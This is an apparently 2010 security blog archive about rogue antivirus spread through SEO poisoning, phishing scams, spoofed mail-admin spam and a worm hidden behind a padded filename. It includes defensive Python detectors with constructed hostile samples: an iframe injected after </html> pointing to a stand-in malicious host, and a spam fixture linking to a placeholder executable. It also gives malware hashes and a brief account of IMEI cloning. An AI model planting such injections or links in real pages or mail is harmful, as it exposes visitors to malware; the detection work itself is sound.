Saturday, February 27, 2010

SEO poisoning not in well, but it’s aiming for the water heater

People looking to take advantage of the savings from the government during these harder financial times are being hit with other financial burdens (Rogue AV software).

Our (environmentally conscious) researcher Adam Thomas heard about a “green” hot water heater that might be a good addition to his Earth-friendly home. So he did a Web search for “GE geo spring water heater.”

What he found wasn’t Earth or anything else-friendly! SEO poisoning galore:

Here’s what the malicious pages deliver:

It’s the SecurityTool rogue that has been making the rounds since October (Read More here.)

Here's the link to the U.S. Department of Energy program that gives rebates for Energy Star appliances http://www.energysavers.gov/financial/70020.html .

Friday, February 26, 2010

Insight into fake AV SEO

In this post I want to highlight how SEO attacks are working:
  1. Pages using server-side kits to fool search engine bots into ranking them highly are uploaded to legitimate web sites. If all goes to plan, when a user searches for a popular term, links to these pages appear high up in the search engine results. In the example below, the malicious SEO page was the 2nd item in the search results (highlighted in blue).
  2. When the user arrives on such a page (highlighted in green in the example below), the referrer is typically checked to ensure they came from a search engine. If so, they are redirected (302 redirect) to another site (orange below).
  3. There are typically additional levels of redirection from this point. In the example shown below, the user is bounced from the .org site to the .in site (purple).
  4. Finally, the user is redirected to the fake AV distribution site (red). This is where the user receives the usual visual trickery intended to fool them into installing the rogue application.
So how do you protect against these attacks? Of course, detecting the fake AV itself is important, and as Graham indicated, Mal/FakeAV-BW does just that for this spate of attacks. But there are additional layers of protection as well, which are equally important.

The first is URL filtering - blocking access to the malicious sites used in these attacks. This is highly effective, though attackers make it ever more challenging by continually using freshly registered domains (.in being a current favourite). On top of this, detection of some of the redirect pages themselves can be really valuable. Earlier this week I added Troj/JSRedir-AT for this very purpose. Additionally, detection for the scripts used in the fake AV distribution sites themselves provides another tier of protection (blocked as Mal/FakeAvJs-A). With this detection in place, when the user clicks on the SEO link in the search engine they simply see a block page and the attack is thwarted.

If I look through some of the URLs on which we have been detecting Troj/JSRedir-AT over the past 24 hours, I can extract the search terms that the user was using. The usual suspects are present: ‘killer whales’, ‘Winter Olympics’, technology, Tiger Woods (sigh) and ‘American Idol’ (bigger sigh).
jagr+hit
ovechkin+hit+on+jagr
Cheryl+Bernard+swimsuit
Dawn+Brancheau
hannah+storm+outfit+picture
Hannah+Storm
olympic+hockey+bracket+2010
seaworld+accident
shamu+attacks
who+did+tim+urban+replace+on+american+idol
tiger+woods+apology+video
american+idol+judges
motorola+backflip+specs
Scotty+Largo+Pictures
seaworld+trainer+killed
shamu+attacks
usa+hockey+roster
natalee+holloway+latest+news
natalie+holloway
yu+na+kim
whale+kills+trainer+video
As ever, it is the combination of product technologies that provides the best protection against such threats.

Troj/IFrame-DY: Old websites don’t die they just get infected

Earlier this week Sophos informed a UK Local Police Authority (Hertfordshire) that a website they owned was infected with Troj/IFrame-DY.

It turns out that the Police Authority has a new site and the infected site is an old one that just leads the user to the new site:

Unfortunately, the old site also contains a malicious script, appended after the closing /HTML tag.
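A simple check for exactly this kind of infection is to look at what follows the last closing </html> tag, since a well-formed page needs nothing there yet browsers still render and execute whatever is appended. The following Python is an added example (not code from the post or from Sophos); the two pages it scans are constructed, and the iframe URL is a placeholder.

```python
import re

END_TAG = re.compile(r"</html\s*>", re.IGNORECASE)
ACTIVE_CONTENT = re.compile(r"<(script|iframe|object|embed)\b", re.IGNORECASE)

# Constructed: a legacy "we have moved" page that relies on a client-side redirect.
CLEAN_PAGE = """<html><head>
<meta http-equiv="refresh" content="5;url=http://new-site.example/">
</head><body>This site has moved to <a href="http://new-site.example/">our new site</a>.</body></html>
"""
# Constructed: the same page with an iframe appended after </html> (placeholder URL).
INFECTED_PAGE = CLEAN_PAGE + '<iframe src="http://malicious.example/in.php" width="1" height="1"></iframe>\n'

def content_after_html(page):
    """Whatever follows the last </html> tag, stripped; None when the page has no closing tag."""
    last = None
    for last in END_TAG.finditer(page):
        pass
    if last is None:
        return None
    return page[last.end():].strip()

def appended_active_content(page):
    """True when script/iframe/object/embed markup sits after the closing </html> tag."""
    tail = content_after_html(page)
    return bool(tail) and ACTIVE_CONTENT.search(tail) is not None

def scan_pages(pages):
    """pages: {path: html}. Returns the paths that carry active content after </html>."""
    return [path for path, html in pages.items() if appended_active_content(html)]

if __name__ == "__main__":
    print(scan_pages({"old/index.html": INFECTED_PAGE, "new/index.html": CLEAN_PAGE}))
```

Run it over a crawl of every site you still host, abandoned ones included: the check is cheap, and an old redirect-only page is exactly where nobody is looking.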


There are several ways of migrating users to a new website:
  • Deleting the old site and letting a search engine take the strain
  • Doing server-side redirects
  • Asking the ISP to point the old website to the new site's IP address
  • Relying on client-side redirects
There are benefits and costs for all the above methods; however, from a security point of view, having an old, abandoned (not updated and secured) website is the worst.

Do I Know You?

Imagine that you’re sitting at home catching up on your email backlog. In comes an email from your ISP, FooBarBazCo (some creativity required here, I know). The email seems to be from Technical Support – ‘From: FooBarBazCo.com Team’ – and states that you need to update your email settings as a result of a recent security upgrade. Can you trust it?

Today we observed an increase in spam messages containing links to a particular malicious URL. The messages masquerade as having come from mail administrators, with the ‘from’ address spoofed so that they appear to have come from the same network domain as the address to which the mails are sent (the ‘from’ and ‘to’ addresses are actually identical, although this will not be visible in most email programs).

The received messages state that mailbox 'settings were changed' and urge users to 'apply the new set of settings' by clicking a link to an executable, which unsurprisingly turns out to be malicious:
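The two tell-tale signs described above (a From address identical to the To address, and a link to an executable) can be checked mechanically at the mail gateway. The following Python is an added example, not code from the post or from Symantec. It assumes the ISP domain from the story (foobarbazco.com) and that the topmost Received header was written by your own MX; both sample messages are constructed.

```python
import re
from email import message_from_string
from email.utils import parseaddr, getaddresses
from urllib.parse import urlparse

OUR_DOMAIN = "foobarbazco.com"          # assumption: the ISP domain used in the post
EXEC_EXTENSIONS = (".exe", ".scr", ".com", ".pif", ".bat")

# Constructed: the spoofed "settings were changed" message. The link is a placeholder.
SPOOFED = """\
Received: from 203.0.113.9 (unknown [203.0.113.9]) by mx.foobarbazco.com with SMTP; Fri, 26 Feb 2010 09:12:01 +0000
From: FooBarBazCo.com Team <alice@foobarbazco.com>
To: alice@foobarbazco.com
Subject: Mailbox settings were changed
Content-Type: text/plain

Your mailbox settings were changed. Apply the new set of settings here:
http://updates.example.invalid/settings.exe
"""

# Constructed: an ordinary internal message for comparison.
LEGITIMATE = """\
Received: from webmail.foobarbazco.com (webmail.foobarbazco.com [192.0.2.7]) by mx.foobarbazco.com with ESMTP; Fri, 26 Feb 2010 09:15:44 +0000
From: Bob <bob@foobarbazco.com>
To: alice@foobarbazco.com
Subject: lunch?
Content-Type: text/plain

See the menu at http://cafe.example/menu.html
"""

def self_addressed(msg):
    """True when the From address is also one of the To addresses."""
    sender = parseaddr(msg.get("From", ""))[1].lower()
    recipients = {addr.lower() for _, addr in getaddresses(msg.get_all("To", []))}
    return bool(sender) and sender in recipients

def handed_in_from_outside(msg, domain):
    """Look at the topmost Received header (our own MX's hop) and report whether the host
    that handed the message over sits outside `domain`."""
    received = msg.get_all("Received") or []
    m = re.match(r"\s*from\s+(\S+)", received[0]) if received else None
    if not m:
        return True                       # no usable trace: treat as external
    host = m.group(1).lower()
    return not (host == domain or host.endswith("." + domain))

def executable_links(msg):
    payload = msg.get_payload(decode=True)
    text = payload.decode("utf-8", "replace") if isinstance(payload, bytes) else str(msg.get_payload())
    return [u for u in re.findall(r"https?://[^\s<>\"']+", text)
            if urlparse(u).path.lower().endswith(EXEC_EXTENSIONS)]

def analyze(raw, domain=OUR_DOMAIN):
    """Reasons this message matches the mail-admin spoof pattern; an empty list means none found."""
    msg = message_from_string(raw)
    reasons = []
    if self_addressed(msg):
        reasons.append("From address equals To address")
    sender_domain = parseaddr(msg.get("From", ""))[1].lower().rpartition("@")[2]
    if sender_domain == domain and handed_in_from_outside(msg, domain):
        reasons.append("claims our domain but was handed to our MX by an outside host")
    links = executable_links(msg)
    if links:
        reasons.append("body links to an executable: " + ", ".join(links))
    return reasons

if __name__ == "__main__":
    print(analyze(SPOOFED))
    print(analyze(LEGITIMATE))
```

The Received-header test is what a user cannot see in a mail client but a gateway can: a message that claims to come from your own domain yet arrived from an outside host is spoofed regardless of how plausible the From line looks.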

Clicking the link leads to a download of the following misleading application, which we see here with the usual UI misspellings and fake scan results:

And, naturally, the usual prompt for registration:
Uh-oh: "25 critical system objects"! But I just installed the OS!

Symantec products detect the downloaded misleading application as AntiVirus2010. Do always be sure, however, to confirm with your ISP or IT team before following such “directions” to run a particular file and certainly before running any unknown executables hosted on external domains.

Facebook's news-feed patent could mean lawsuits

(CNN) (CNET) -- Facebook this week was awarded a patent pertaining to streaming "feed" technology -- more specifically, "dynamically providing a news feed about a user of a social network," complementing another patent filing that has been published but not yet approved.

The implications for this, as AllFacebook.com pointed out earlier on Thursday, are far-flung: Facebook may choose to pursue action against other social-media sites that potentially violate this patent.

Twitter, as AllFacebook points out, is effectively one giant news feed, to the extent that it clearly has influenced some of the changes that Facebook made to its own feed technology.

That reaction could be alarmist. And yet prominent figures elsewhere in the social-media world don't seem thrilled.

"There goes the neighborhood," quipped Chris Messina, an open-standards advocate who recently joined Google as a member of its new Social Web Team, on Twitter.

"Can I start screaming loudly about patent reform now?" tweeted Matt Galligan, who founded a streaming-feeds start-up called Socialthing and eventually sold it to AOL.

Indeed, technologies that now may be technically encompassed by Facebook's patent are so widespread on the Web that they're more or less inextricable from the basic tenets of social media.

We'll probably be hearing more about this patent and how it changes the industry before long.

How times do change: When the "news feed" first launched in the fall of 2006, members revolted in one of the first instances of large-scale Facebook user outrage.

They denounced it as "stalkerish" and disapproved of what they saw as a lack of privacy controls. Facebook founder Mark Zuckerberg ultimately posted an apology note to the company blog in response.

Sunday, February 21, 2010

Zeus botnet continues: 2,500 victims estimated

Herndon, Va., forensics firm NetWitness has said that the Zeus botnet has breached the networks of nearly 2,500 organizations in nearly 200 countries, including 10 U.S. federal agencies. NetWitness researchers said many victims are Fortune 500 companies in energy, finance and high tech sectors.

NetWitness based its conclusions on information from a 75-gigabyte collection of data that they intercepted. It was information the botnet had stolen in one month.

The Zeus botnet, which started in 2008, is believed to have 74,000 machines infected.

Researchers said the group behind Zeus also had machines infected with Waledac and had changed instructions in the botnet several times in order to find and steal different types of data.

The botnet controllers, using servers in Germany and the Netherlands, had breached networks in 196 countries including Egypt, Mexico, Saudi Arabia, Turkey, and the U.S.

Story here.

Scammers Offering Tax Refunds

Fraudsters never seem to rest. They have now turned their attention to phishing using the Indian Income Tax Department’s name and branding. It is tax return season in India, and it is well known that people will be filing their income tax returns for the end of the fiscal year. Hence, phishers have chosen the right time to strike, since most users will not be aware of these attacks.

Attackers are sending spam email messages with subject lines such as, “Tax Return!“ with the below body text:

“Dear applicant, After the last annual calculation of your fiscal activity we have determined that you are eligible a tax refund of XXX Rupees. To access the form for your tax refund please click here.”


The link that is provided is titled “Tax Refund Online Form” and it leads to a phishing site that is a spoofed version of the Indian Tax Department site, incometaxindia.gov.in. The phishing Web page asks customers to submit their sensitive information such as personal information and bank or credit card details.

Below is a screenshot of one such phishing site:


After submitting the information, the page redirects to the legitimate site of the Indian Tax Department. The fraudulent site is hosted on U.S.-based servers.

Internet users are advised to follow best practices to avoid phishing attacks. Here are some basic tips for avoiding online scams:

Caution:

  • Please be very careful when handling suspicious emails and URLs that are seeking personal information.
  • Do not visit any links in email messages of dubious origin or intent.
  • Do not enter any of your details on these kinds of sites.
  • Please use the legitimate site of http://www.incometaxindia.gov.in/ for any help regarding an income tax refund in India.

Apple iPhone Warranty Scam

Symantec has recently observed phishing scams targeting Apple iPhones in order to harvest serial numbers, IMEI numbers, model and capacity information, and so on.


What is an IMEI?

An IMEI (international mobile equipment identity) is a 15-digit unique number used by GSM networks to identify valid devices. Every GSM, WCDMA, or iDEN mobile phone (and even the odd satellite phone) has an IMEI. It can be found under the battery of the device or by typing *#06# on the mobile. If your phone or device is lost or stolen you can report it to your service provider, providing the IMEI number. The service provider can then blacklist the IMEI number, rendering the device unusable in that country.
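The 15th digit of an IMEI is a Luhn check digit over the first 14 (the type allocation code plus serial), which is how a handset or a form can tell a well-formed IMEI from a random 15-digit string. The following Python is an added example, not code from the post or from Symantec; the sample IMEI is a constructed value chosen so that its check digit is valid.

```python
def luhn_check_digit(digits14):
    """Luhn check digit for the first 14 IMEI digits. Counting from the right, every second
    digit is doubled (subtracting 9 if the result exceeds 9) before summing."""
    total = 0
    for i, ch in enumerate(reversed(digits14)):
        d = int(ch)
        if i % 2 == 0:          # the digit next to the check digit is the first one doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return (10 - total % 10) % 10

def normalize_imei(text):
    """Strip the separators people type (spaces, dashes); returns None unless 15 digits remain."""
    cleaned = text.replace(" ", "").replace("-", "")
    return cleaned if cleaned.isdigit() and len(cleaned) == 15 else None

def is_valid_imei(text):
    digits = normalize_imei(text)
    return digits is not None and luhn_check_digit(digits[:14]) == int(digits[14])

def imei_parts(text):
    """Split a valid IMEI into its fields; None for an invalid one."""
    digits = normalize_imei(text)
    if digits is None or not is_valid_imei(digits):
        return None
    return {"tac": digits[:8], "serial": digits[8:14], "check": digits[14]}

if __name__ == "__main__":
    print(is_valid_imei("49-015420-323751-8"), imei_parts("490154203237518"))
```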


Why do scammers need the IMEI number?

A device with a blacklisted IMEI is unusable in that country. There is no restriction on having the same IMEI number for two devices. So, scammers can simply steal the number from other users who have valid or working IMEIs and copy it to the stolen device. Scammers can then use the stolen device or even sell it.


How are scammers stealing IMEIs?

Scammers have been creating phishing sites that make the claim that a free one-year warranty extension for a certain mobile device or devices is available. To obtain the (fake) offer, users are asked to provide their device information, including serial number, IMEI number, type of phone, and so on. Below is an example of such a phishing scam:

iphone 1

iphone 2

Once the scammers gather the iPhone information for valid devices, they replicate it to the stolen devices. The process of changing the device IMEI isn’t difficult to perform. It can be done by installing some drivers onto a system that is connected to the mobile device through a USB cable, without the use of any external devices. This way they can convert the device information to any set of data that they choose.

Giving out device information can be dangerous because criminals can use such info to perform illegal activities. Therefore, it is recommended that users remain wary and use caution when it comes to these types of scams.

Internet users are advised to follow best practices to avoid phishing attacks. Here are some basic tips for avoiding online scams:
  • Do not click on suspicious links from emails.
  • Check the URL of the website and make sure that it belongs to the brand.
  • Type the domain name of your brand directly into your browser’s address bar rather than following any link.
  • Frequently update your security software, such as antivirus and antispyware.

30 percent of U.S. is totally safe from Internet threats

A survey of 54,000 households (129,000 people) commissioned by National Telecommunications and Information Administration (NTIA) last year found that 30 percent of U.S residents did not use the Internet at home or at work.

The study, based on Census Bureau work, found that 64 percent of households had connections. In 2007, only 51 percent did.

The NTIA researchers found that of those without connections, 38 percent said they didn’t need Internet and 26 percent said it was too expensive. In rural areas, 11 percent said they didn’t have any Internet access available. In urban areas, one percent said they couldn’t get it.

Story here.

Report here.

Exploit for zero-day vuln in Firefox is for sale

Evgeny Legerov, founder of Intevydis in Moscow, has created an exploit that hits a previously unknown heap-corruption vulnerability in the Firefox browser. The code isn’t readily available though, since he’s put it in a module to the automated exploitation system he sells (reportedly at a considerable price.) Legerov has not provided information on the vulnerability to Mozilla.

The Intevydis site says: “Exploitation frameworks are not new on the market, but only we may offer you hundreds of CANVAS modules for unpatched and unknown vulnerabilities in highly popular software products.”

The exploit works against Firefox 3.6 on Windows XP and Vista.

If Legerov hasn’t given Mozilla details of the hack, as one would under the rules of responsible disclosure, it raises the question: “who does he sell his software to?”

There don’t seem to be any more details of the vulnerability available. Expectations are that the exploit will become more widely available in the wild shortly. Vulnerability research firm Secunia gives only general advice for users:

“Solution

Do not visit untrusted websites or follow untrusted links.”

Story here.

Symantec Reputation-based Security: Suspicious.Insight detections on VirusTotal

Symantec recently upgraded their scanner on VirusTotal to include their new reputation-based security engine. That has caused a spike in their detection rates, in particular Suspicious.Insight detections, and so I thought I’d take a few minutes to explain some of the background and what is going on.

So what exactly is a Suspicious.Insight detection? These detections are derived from Symantec’s new reputation-based security technology. They highlight files that have not yet developed a strong reputation (either good or bad) amongst Symantec’s community of users. Their goal is to keep their users’ machines safe, and part of achieving that goal means helping their users make informed choices about the files they allow on to their systems. Suspicious.Insight detections help shine a spotlight on files that have not yet developed a full reputation.

Why are they doing this, and what’s wrong with the conventional approach to security using traditional antivirus signatures? Unfortunately, traditional antivirus techniques are no longer as strong a defense as they used to be. Over the last few years Symantec has observed a seismic shift in the threat landscape. Consider this: ten years ago, Symantec published little more than a few handfuls of new virus definitions each week. Today that number has grown dramatically, and they currently publish, on average, well in excess of fifteen thousand new virus definitions each day. So, why is this? Well, virus writers have realized that once a virus definition for their malware exists, their game is over. So instead of hoping that a new threat will make its way across the globe to a large number of people without being blocked by a security product’s latest signature, they are today focusing their efforts on shape-shifting as frequently as possible to avoid the traditional detection methods.

They use techniques such as server side polymorphism, obfuscation, and encryption to cloak their threats in a disguise, and then change that disguise as frequently as possible. So today, the vast majority of malware is generated in real-time on a per-victim basis, which means that each such malicious program will be rated as being entirely new and low-prevalence by a reputation-based system. In contrast, most legitimate software has vastly different characteristics—it often comes from known publishers, has high adoption rates, shares much in common with earlier versions of the software, and so on. The Suspicious.Insight detection, therefore, is meant to inform the user that a given application is unproven and not yet well known to Symantec’s tens of millions of users.

Does this mean that all Suspicious.Insight detections will be flagged by Norton and Symantec products? No, and for several reasons:

  • This detection looks at many different aspects of a file, including how it arrived on the system, publisher information, when it arrived, etc. Using these attributes, most users do not see Suspicious.Insight detections on clean files. (Note that on an online scanner such as VirusTotal, many of these attributes are absent, hence a Suspicious.Insight detection will be more likely). In effect this means that most users will never encounter a Suspicious.Insight false positive.
  • Today, Norton products warn the user about Suspicious.Insight detections, they do not block these files. The file is labeled "unproven," and the user is allowed to make the final decision. Note that future versions of Symantec's corporate Endpoint Protection products will include reputation and will allow administrators to configure blocking policies based on their specific tolerance for risk.
  • Due to the nature of their reputation system, even if a clean file is initially flagged as "unproven" (which is rare), it will typically develop a good reputation very quickly—usually within a day or two.

Ultimately the goal of Suspicious.Insight is to empower their users to make better informed choices about the software they allow onto their machines.
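The reasoning above can be made concrete with a toy reputation rule set. The following Python is an added illustration, not Symantec's algorithm or code: a file with full endpoint context (prevalence, age, signer, origin) is classified differently from the same bytes submitted to an online scanner with that context missing, and a per-victim polymorphic sample always lands in "unproven" because nobody else has ever reported it. Thresholds, hashes and signer names are constructed.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class FileContext:
    sha256: str
    prevalence: int                 # machines in the community that have reported this exact file
    age_days: Optional[float]       # days since first seen; None when unknown
    signer: Optional[str]           # publisher from a valid code signature, or None
    origin_url: Optional[str]       # download origin; None when no context (e.g. an online scanner)

KNOWN_BAD_HASHES = {"0" * 64}                     # constructed placeholder blacklist
TRUSTED_SIGNERS = {"Example Software Ltd"}         # constructed placeholder publisher list
GOOD_PREVALENCE, GOOD_AGE_DAYS = 1000, 2           # assumption: what "well known" means here

def classify(ctx):
    """'bad', 'good' or 'unproven' for a file given whatever context is available."""
    if ctx.sha256 in KNOWN_BAD_HASHES:
        return "bad"
    if ctx.signer in TRUSTED_SIGNERS:
        return "good"
    if ctx.prevalence >= GOOD_PREVALENCE and (ctx.age_days or 0) >= GOOD_AGE_DAYS:
        return "good"
    return "unproven"                             # low prevalence or too young to judge

def policy_action(verdict, mode="warn"):
    """Consumer mode warns on unproven files and lets the user decide; an administrator
    could choose mode='block' to match a lower tolerance for risk."""
    if verdict == "bad":
        return "block"
    if verdict == "unproven":
        return "block" if mode == "block" else "warn"
    return "allow"

def after_community_reports(ctx, new_reports, days):
    """The same file a little later, once more machines have reported it."""
    return FileContext(ctx.sha256, ctx.prevalence + new_reports,
                       (ctx.age_days or 0) + days, ctx.signer, ctx.origin_url)

if __name__ == "__main__":
    tool = FileContext("a" * 64, 5000, 30, None, "http://intranet.example/tool.exe")
    print(classify(tool), classify(FileContext("a" * 64, 0, None, None, None)))
```

The last function models the third bullet: a clean but unsigned file that starts out "unproven" crosses the prevalence and age thresholds within a day or two of normal use, while each uniquely generated malware sample never does.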

For more information, check out the following resources:

Blog: Norton Internet Security 2010 – Download Insight
Blog: The New Model of Consumer Protection: Reputation-based Security
Product Tutorial: How To Use Norton Download Insight

0day vuln in Adobe Download Manager disclosed


First, make a note: after Adobe updates, restart your machine immediately to remove the Adobe Download Manager – it can be a vector for malcode.

Now, back to our story.

Aviv Raff has discovered a vulnerability with Adobe’s web site in combination with its Download Manager, an ActiveX script that is used to download updates for Reader and Flash. After a Reader or Flash update the download manager remains running on a user’s machine until it is rebooted. Malicious operators could exploit it to download their code of choice.

Raff demonstrated the flaw by using the download manager to download a copy of Windows calculator.

He has notified Adobe of the problem but has not publicly disclosed the finer details of the vulnerability.

Raff’s blog post here.

News story here.

Antivirus NOT

“Damned thieves. Stole our logo. I suppose we should be flattered, though.”
— A.E.

Old rogue, new package:



AntivirusProtectionCenter
av2009.exe :
crc6:7f3d73762762
crc8:003091628c68decc
md5:d71d1e303ab963fdae76936ba52a05b7

AMC.exe :
crc6:1d6922972762
crc8:003005cfbb91b729
md5:e5555754fd758fc2be1374796f9433e2

Hashes differ from their PersonalAntiMalware, added 2/16/2010:

opener_.exe :
crc6:8ee75c08081d
crc8:00dc55e5aaa82efa
md5:5bb290cd1eb419ca98ca1f31273f7219

“It’s the same gang that had the code saying ‘hello Sunbelt software’
They are watching us.”
— P.J.

Internet users skip security because of jargon

Representatives of computer companies and governments meeting at the EastWest Institute security meeting in Brussels said that an industry culture of obscure jargon is preventing the world’s two billion Internet users from putting security measures in place to protect themselves.

The group met to figure out how to protect computer users from massive abuse, fraud, online theft, vandalism and espionage.

The New York Times story carried the following quotes from those at the meeting:

"The malicious and criminal use of cyberspace today is stunning in its scope and innovation," -- Dell Services President Peter Altabef.

"If you don't demystify security, people become anxious about it and don't want to do it…. There are some people in the profession who to some degree enjoy the mystification of what they do, that it's not penetrable. It's almost a sense of superiority," -- former U.S. Homeland Security Secretary Michael Chertoff

"We use a lot of complex terminology where it's not needed. We don't encourage people to think enough," -- Steve Purser, head of Technical Competence at the EU’s European Network and Information Security Agency.

The ugly reality is that computers are not simple and computer security is very technical and ever-changing.

Personally I don’t think very many technical people have the “sense of superiority” that Chertoff mentioned. A huge number of them have mathematical, detail-oriented minds and they simply aren’t good communicators. There are fabulous communicators in the computer security space, but, it takes a “big picture” mind set to communicate well. It takes a “little-tiny-detail” mind to write code, run networks and keep security systems running.

The best we can do is to keep trying through:

-- industry wide consciousness that we NEED to explain things to non-technical people
-- company blogs written for the common user
-- resource pages with easy-to-understand materials about security
-- organizations such as the various Computer Emergency Response Teams (CERTs) and non-profit organizations
-- security-awareness days and PR events
-- graphic user interfaces, help screens and manuals written with inexperienced users in mind

Companies, organizations and government agencies should hire professional communicators, teach them computer security and have them write/tweet/blog/speak to teach kids and the “home user” what they need. Hey, the newspaper business is going the way of the buggy-whip industry. There are loads of great journalists out there looking for a new career.

That’s how I got here.

Story here.

A great resource for “non-technical” people can be found at US-CERT’s site: http://www.us-cert.gov/nav/nt01/

And the National Cyber Security Alliance site StaySafeOnline.org: http://www.staysafeonline.org/

The .ru Substitutions for .cn Domains

In the month of January, we reported a drop in .cn spam. This was due to changes in the domain registration process introduced by CNNIC. In the first week of February, the .cn spam volume fell further and fluctuated between 0 and 4 percent of total URL spam.

Another interesting trend was observed during this period. On January 21 the volume of spam containing the .ru top-level domain (TLD) spiked up to 9 percent, and rose further up to close to 40 percent on February 8. Upon closer analysis, it was observed that the .cn domains used in the health spam attacks had been replaced with .ru domains.


Various subject lines observed in the .ru version of health spam are as follows:

Subject: Dear xxxx Extreme 83% discounts
Subject: Your Future Order with 79% off retail
Subject: Sales Event get 78% off
Subject: xxxx Sale Day, save 80%!

The reason for the spammers’ move away from .cn domains is obvious: the added complexity of registering new .cn domains. For now, there is no significant variation in the spam volume containing other TLDs. However, in the future, spammers may try registering domains that are easily available. Symantec will keep a close watch on variations in this trend to keep our readers informed.
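Tracking a substitution like .cn to .ru is a matter of measuring each TLD's share of URL spam per period and looking for one share that falls while another rises by a similar amount. The following Python is an added example (not code from the post or from Symantec); the URL records and the volumes are constructed to mimic the trend described, and the 25-point threshold is an assumption.

```python
from collections import Counter, defaultdict
from urllib.parse import urlparse

# Constructed sample: (week, URL seen in a spam message). Week 04 is .cn-heavy, week 06 has moved to .ru.
SAMPLE = (
    [("2010-W04", "http://shop%d.example.cn/" % i) for i in range(6)]
    + [("2010-W04", "http://shop%d.example.com/" % i) for i in range(3)]
    + [("2010-W04", "http://shop0.example.ru/")]
    + [("2010-W06", "http://shop%d.example.ru/" % i) for i in range(4)]
    + [("2010-W06", "http://shop%d.example.com/" % i) for i in range(5)]
    + [("2010-W06", "http://shop0.example.info/")]
)

def tld(url):
    host = urlparse(url).hostname or ""
    return host.rsplit(".", 1)[-1].lower()

def tld_share(records):
    """{week: {tld: percentage of that week's URL spam}}."""
    per_week = defaultdict(Counter)
    for week, url in records:
        per_week[week][tld(url)] += 1
    return {week: {t: round(100.0 * n / sum(counts.values()), 1) for t, n in counts.items()}
            for week, counts in per_week.items()}

def substitutions(share, before, after, threshold=25.0):
    """TLDs whose share fell by at least `threshold` points, and those that rose by at least that much."""
    tlds = set(share[before]) | set(share[after])
    delta = {t: share[after].get(t, 0.0) - share[before].get(t, 0.0) for t in tlds}
    fell = sorted(t for t, d in delta.items() if d <= -threshold)
    rose = sorted(t for t, d in delta.items() if d >= threshold)
    return fell, rose

if __name__ == "__main__":
    share = tld_share(SAMPLE)
    print(share)
    print(substitutions(share, "2010-W04", "2010-W06"))
```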

Phishing the Brands of Online Auction Marketing Tools

The popularity of online auctions paves the way for the development of online auction marketing tools. These tools are software applications intended to facilitate the sellers’ side of popular online auction websites. Some of the tools that help sellers in auctions are: image hosting to display galleries of their products, listing of best bidders in a single template, automatic inventory systems to notify sellers when stock is low, etc. With the help of these tools, online auctions are easier and less time-consuming.

Phishing attacks targeting the brands of online auction and shopping websites are common. For better success rates, phishers are now trying alternate means to obtain the credentials of online auction customers by attacking legitimate brands providing auction-marketing tools.

Below is a phishing site that spoofs the branding of a leading auction marketing tools website:


After entering credentials on the auction-tools phishing site, the user is asked to verify their account with the main online auction website, as in the example above. The phishing page states that the verification process is required to obtain a token for access to the tools. It also states that if the user opts out of the token verification process, tools that enable the import of seller information, financial gains from shipping insurance, the update of image-scrolling galleries of products, etc. will not be available to the user. A link is provided on the phishing page that reads “Verify your token.” Upon clicking the link, the user is redirected to the phishing page for the main auction website.

Internet users are advised to follow best practices to avoid phishing attacks. Here are some basic tips for avoiding online scams:
  • Do not click on suspicious links in emails.
  • Check the URL of the website and make sure that it belongs to the brand.
  • Type the domain name of your brand directly in your browser rather than following any link.
  • Frequently update your security software, such as antivirus and antispyware.

Do They Know it’s (not) Christmas Time at All?

I saw something quite funny when checking out the spam feeds the other day. An attachment kept appearing, once in a while, with the name Christmas Card.zip. It was making sporadic appearances in the feeds (and the number of spam email messages was quite low), but there were a couple of these odd messages at equally odd hours of the day:


The email message itself was a run-of-the-mill electronic greeting card with an HTML body containing a nice Flash animation—the Flash animation actually comes from a legitimate source (123greetings.com). The email body contains a message asking the user to open the attachment to see who sent the email. Of course, opening the attachment yields a malicious file. The name of the file inside is Christmas Card.htm[MANY SPACES].exe and it is already detected by Symantec as W32.Ackantta.G@mm.

The question I leave you with is this: are the people behind the Ackantta worm living in some kind of parallel universe or time warp where every day is Christmas? Or perhaps it is some worm gone out of control? I'll leave you to ponder that one. Bearing in mind that it is now mid-February, you can either consider them late to the Christmas party or way too early.
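The "Christmas Card.htm[MANY SPACES].exe" trick relies on file dialogs and mail clients truncating a long name so that only the decoy extension is visible. A gateway can catch it without opening the payload by inspecting member names inside the ZIP. The following Python is an added example (not code from the post or from Symantec); it builds a constructed stand-in for Christmas Card.zip in memory with a harmless placeholder payload and then scans it.

```python
import io
import re
import zipfile

EXEC_EXT = r"(?P<ext>exe|scr|com|pif|bat|cmd|vbs|js|hta)"
# decoy extension, a run of at least two spaces, then the real executable extension
PADDED = re.compile(r"\.(?P<decoy>\w{1,5})(?P<pad>\s{2,})\." + EXEC_EXT + r"$", re.IGNORECASE)
DOUBLE = re.compile(r"\.(?P<decoy>\w{1,5})\." + EXEC_EXT + r"$", re.IGNORECASE)
EXECUTABLE = re.compile(r"\." + EXEC_EXT + r"$", re.IGNORECASE)

def name_verdict(name):
    """Why an attachment filename is suspicious, or None if it looks harmless."""
    m = PADDED.search(name)
    if m:
        return "'.%s' decoy, %d spaces, real extension .%s" % (m["decoy"], len(m["pad"]), m["ext"].lower())
    m = DOUBLE.search(name)
    if m:
        return "double extension ending in .%s" % m["ext"].lower()
    m = EXECUTABLE.search(name)
    if m:
        return "executable attachment (.%s)" % m["ext"].lower()
    return None

def scan_zip(data):
    """{member name: verdict} for the suspicious members of a ZIP given as bytes."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for member in zf.namelist():
            verdict = name_verdict(member)
            if verdict:
                findings[member] = verdict
    return findings

def build_sample_zip():
    """Constructed stand-in for Christmas Card.zip: the padded name from the post plus a benign file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Christmas Card.htm" + " " * 60 + ".exe", b"placeholder, not a real program")
        zf.writestr("readme.txt", b"plain text")
    return buf.getvalue()

if __name__ == "__main__":
    for member, verdict in scan_zip(build_sample_zip()).items():
        print(repr(member), "->", verdict)
```

Matching on the name alone is deliberately conservative: it costs nothing, needs no signature for the worm itself, and a legitimate sender has no reason to put sixty spaces in a filename.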

Wednesday, February 17, 2010

The Facebook Team informs you…

In the last two days our lab has detected a flood of email messages that seem to have been sent by the Facebook team urging users to submit a new account agreement. We’ve seen around 16,000 since yesterday.

The subject of the message is UPDATED ACCOUNT AGREEMENT and the attached file is called AGREEMENT.ZIP.

The message is like the following:


